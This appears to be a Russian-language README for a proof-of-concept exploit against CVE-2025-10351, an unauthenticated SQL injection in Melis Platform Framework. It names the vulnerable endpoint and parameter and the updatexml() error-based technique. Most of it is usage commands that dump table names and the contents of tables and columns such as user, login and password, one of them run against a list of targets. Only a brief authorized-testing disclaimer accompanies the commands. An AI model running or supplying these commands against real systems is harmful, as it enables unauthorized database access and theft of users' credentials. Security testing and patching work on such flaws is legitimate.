
Эксплойт для CVE-2025-10351. SQL Injection на Melis Platform Framework.
POC для CVE-2025-10351: Неаутентифицированная уязвимость SQL-инъекции, затрагивающая определенную конечную точку в платформе Melis Platform Framework.
Этот POC предназначен для эксплуатации уязвимости неаутентифицированной error-based SQL-инъекции в конечной точке:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
Он использует updatexml() в MySQL для извлечения:
Также обнаруживает возможные векторы time-based SQLi для дальнейшей ручной эксплуатации.
Установите зависимости с помощью:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
tables_extracted.txt<table_name>_data.txtЭтот документ предназначен только для авторизованного тестирования безопасности и устранения уязвимостей. Не используйте PoC или шаги воспроизведения против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения. Автор не несет ответственности за неправомерное использование.
Сделано с ❤️ Manuel Iván San Martín Castillo
| Аргумент | Описание |
|---|
-u | Целевой URL |
-p | Порт (80, 443 и т.д.) |
-l | Файл со списком URL |
-s | Время ожидания для time-based тестов (по умолчанию: 1с) |
-at | Дамп всех имен таблиц |
-t | Указать имя таблицы |
-ac | Дамп всех столбцов указанной таблицы |
-c | Список столбцов для дампа через запятую |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | Отключить проверку TLS при использовании прокси-соединений |
--cookie | Cookies для авторизованных запросов |
--debug | Режим отладки |